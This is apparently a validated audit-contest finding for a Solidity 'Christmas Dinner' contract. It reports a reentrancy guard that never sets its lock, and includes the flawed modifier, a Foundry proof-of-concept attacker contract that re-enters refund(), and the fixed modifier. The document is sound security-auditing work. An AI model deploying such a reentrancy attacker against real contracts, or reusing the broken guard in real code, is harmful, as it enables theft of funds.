Christmas Dinner

First Flight #31
Beginner FriendlyFoundrySolidity
100 EXP
View results
Submission Details
Severity: high
Valid

Critical Reentrancy Vulnerability in NonReentrant Modifier

Description: The nonReentrant modifier implementation contains a critical flaw in its reentrancy protection mechanism. The current implementation fails to set the lock before function execution and incorrectly manages the lock state. The actual vulnerability is found here:

modifier nonReentrant() {
require(!locked, "No re-entrancy");
_;
locked = false;
}

Impact:

  • Allows malicious contracts to reenter the contract during execution

  • Potential complete drain of contract funds

  • Bypassing of intended security measures

Proof of Concept:

// In test file
function testReentrancyAttack() public {
address attacker = makeAddr("attacker");
// Setup attacker contract that implements receive() to reenter
ReentrancyAttacker attackerContract = new ReentrancyAttacker(address(christmasDinner));
// Fund attacker
vm.deal(address(attackerContract), 1 ether);
// Trigger attack
attackerContract.attack{value: 1 ether}();
// Verify multiple reentrant calls succeeded
assertGt(attackerContract.callCount(), 1);
}
contract ReentrancyAttacker {
ChristmasDinner target;
uint256 public callCount;
constructor(address _target) {
target = ChristmasDinner(_target);
}
function attack() external payable {
// Initial deposit
(bool success,) = address(target).call{value: 1 ether}("");
require(success, "Initial deposit failed");
}
receive() external payable {
callCount++;
if(callCount < 3) {
target.refund();
}
}
}

Recommended Mitigation: Implement proper reentrancy guard:

modifier nonReentrant() {
require(!locked, "No re-entrancy");
locked = true;
_;
locked = false;
}
Updates

Lead Judging Commences

0xtimefliez Lead Judge 7 months ago
Submission Judgement Published
Validated
Assigned finding tags:

mutex lock incomplete

0xtimefliez Lead Judge 7 months ago
Submission Judgement Published
Validated
Assigned finding tags:

mutex lock incomplete

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.